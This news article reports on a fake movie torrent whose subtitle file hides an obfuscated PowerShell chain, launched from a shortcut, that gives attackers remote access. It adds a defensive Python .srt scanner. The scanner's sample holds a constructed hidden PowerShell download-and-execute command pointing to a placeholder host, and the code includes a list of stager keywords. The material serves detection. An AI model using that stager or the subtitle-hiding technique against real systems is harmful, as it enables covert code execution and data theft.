Subtitles for popular movie torrent files contain malware

Subtitle files bundled with movie torrents have been found to carry hidden malware that executes malicious commands when the accompanying shortcut is opened.
Fake Leonardo DiCaprio Movie Torrent Drops Agent Tesla Through Layered PowerShell Chain

Fake 'One Battle After Another' torrent hides malware in subtitles
According to Bitdefender, an antivirus software developer, there has been a recent surge in malware detections from torrent files purporting to be the Leonardo DiCaprio movie 'One Battle After Another.' The movie was released in September 2025, and users attempting to illegally download it have fallen victim to the malware.
The torrent file in question contained a variety of files, including a video file, two image files, a subtitle file, and a shortcut file that acts as a launcher.

When the user opens the shortcut, it silently runs cmd.exe and powershell.exe, which extract and execute a malicious script hidden inside the subtitle file, with no prompt to the user. The subtitle file still contains the real subtitles; the encoded, obfuscated code is tucked between the subtitle cues, so the file looks legitimate when opened in a media player.
The first script decodes that payload and works through several stages before running a script named 'RealtekDriverInstall.ps1.' That script checks whether Windows Defender is enabled, attempts to install the Go programming language toolchain, and sets up persistence through a scheduled task that compiles and runs a component called RealtekAudioService. Once everything is in place, the final script is executed, giving the attacker remote access to the computer, where they can steal financial or personal information or use the device to launch further attacks.
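The chain above works because a media player ignores anything in an .srt file that is not a subtitle cue, while cmd.exe and PowerShell will happily pull such lines back out. A defender triaging a torrent's contents can therefore check the subtitle file directly. The following is an added example, not code from Bitdefender or from the malware itself: it parses an .srt into cues, flags any cue text that is far longer than a subtitle line, is shaped like Base64, carries PowerShell-style tokens in the clear, or decodes to such tokens, and also reports any block that is not a well-formed cue at all. The sample subtitle file, the hidden command and the example.invalid host are all constructed for the demonstration; the real payload's encoding was not published on this page, so the Base64/UTF-16LE form used here is an assumption modelled on PowerShell's -EncodedCommand convention.

```python
import base64
import binascii
import math
import re
from typing import List, Optional, Tuple

# Constructed sample data (not from the Bitdefender report): a plausible .srt in which
# cue 3's "text" is a Base64-encoded PowerShell stager. The command, the script name
# placement and the example.invalid host are invented for illustration only.
_HIDDEN_COMMAND = (
    "powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/RealtekDriverInstall.ps1'))"
)
# PowerShell's -EncodedCommand takes Base64 of UTF-16LE text; mimic that shape.
_BLOB = base64.b64encode(_HIDDEN_COMMAND.encode("utf-16-le")).decode("ascii")

SAMPLE_SRT = f"""1
00:00:01,000 --> 00:00:03,500
I don't think we should be here.

2
00:00:04,000 --> 00:00:06,000
Nobody asked you.

3
00:00:06,500 --> 00:00:08,000
{_BLOB}

4
00:00:08,500 --> 00:00:10,000
Let's go.
"""

TIMESTAMP_RE = re.compile(r"^\d{2}:\d{2}:\d{2},\d{3} --> \d{2}:\d{2}:\d{2},\d{3}")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Strings that have no business in a subtitle line but are typical of PowerShell stagers.
SUSPICIOUS_TOKENS = (
    "powershell", "cmd.exe", "cmd /c", "iex(", "iex ", "invoke-expression",
    "frombase64string", "downloadstring", "-enc", "-w hidden", "bypass",
    "new-object", "schtasks", "regsvr32", "rundll32",
)
MAX_SUBTITLE_LINE = 120   # real subtitle lines are short; stagers are not
ENTROPY_MIN_LEN = 40      # entropy is only meaningful on reasonably long lines
ENTROPY_THRESHOLD = 4.5   # English prose sits near 4.0 bits/char, Base64 well above


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's byte-symbol distribution."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_cues(srt_text: str) -> Tuple[List[Tuple[int, List[str]]], List[List[str]]]:
    """Split an .srt into (index, text_lines) cues plus any blocks that are not valid cues."""
    cues, stray = [], []
    for block in re.split(r"\r?\n\s*\r?\n", srt_text.strip()):
        lines = block.splitlines()
        if (len(lines) >= 2 and lines[0].strip().isdigit()
                and TIMESTAMP_RE.match(lines[1].strip())):
            cues.append((int(lines[0]), lines[2:]))
        else:
            stray.append(lines)
    return cues, stray


def suspicious_tokens_in(text: str) -> List[str]:
    """Case-insensitive token search; NULs are stripped so UTF-16LE text also matches."""
    lowered = text.replace("\x00", "").lower()
    return [t for t in SUSPICIOUS_TOKENS if t in lowered]


def decode_base64_line(line: str) -> Optional[str]:
    """Strict Base64 decode; latin-1 never fails, so any byte string becomes searchable."""
    try:
        raw = base64.b64decode(line, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("latin-1")


def inspect_line(line: str) -> List[str]:
    """Return the reasons a single subtitle text line looks like hidden code."""
    reasons = []
    if len(line) > MAX_SUBTITLE_LINE:
        reasons.append(f"line length {len(line)} exceeds {MAX_SUBTITLE_LINE}")
    if len(line) >= ENTROPY_MIN_LEN and shannon_entropy(line) > ENTROPY_THRESHOLD:
        reasons.append(f"entropy {shannon_entropy(line):.2f}")
    hits = suspicious_tokens_in(line)
    if hits:
        reasons.append("plaintext tokens: " + ", ".join(hits))
    if BASE64_RE.match(line):
        reasons.append("base64-shaped")
        decoded = decode_base64_line(line)
        if decoded:
            decoded_hits = suspicious_tokens_in(decoded)
            if decoded_hits:
                reasons.append("decoded tokens: " + ", ".join(decoded_hits))
    return reasons


def scan_srt(srt_text: str) -> List[dict]:
    """Scan every cue and every stray block; return one finding per suspicious line."""
    findings = []
    cues, stray = parse_cues(srt_text)
    for index, text_lines in cues:
        for line in text_lines:
            reasons = inspect_line(line.strip())
            if reasons:
                findings.append({"cue": index, "reasons": reasons})
    for lines in stray:
        for line in lines:
            reasons = inspect_line(line.strip())
            if reasons:
                findings.append({"cue": None, "reasons": ["outside any valid cue"] + reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_srt(SAMPLE_SRT):
        print(f"cue {finding['cue']}: " + "; ".join(finding["reasons"]))
```

Run against a real subtitle file (`scan_srt(open(path, encoding="utf-8", errors="replace").read())`), the same checks apply unchanged; the length and Base64-shape tests catch an encoded blob whether it sits inside a cue or dangling after the last one, and the token search on the decoded bytes is what separates a genuinely odd subtitle (a long URL, a karaoke line) from a stager. The shortcut file itself is the other half of the picture: its target being cmd.exe or powershell.exe rather than the video is the giveaway, and that is worth checking before the subtitle file ever reaches a player.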

Bitdefender identifies the malware as 'Agent Tesla,' a Trojan that runs in memory as a command-and-control agent.
Thousands of people are believed to have shared the files in question. Criminals exploiting interest in new movies to distribute malicious files is nothing new, but Bitdefender noted that this case 'stands out for its unusually complex and stealthy infection chain.'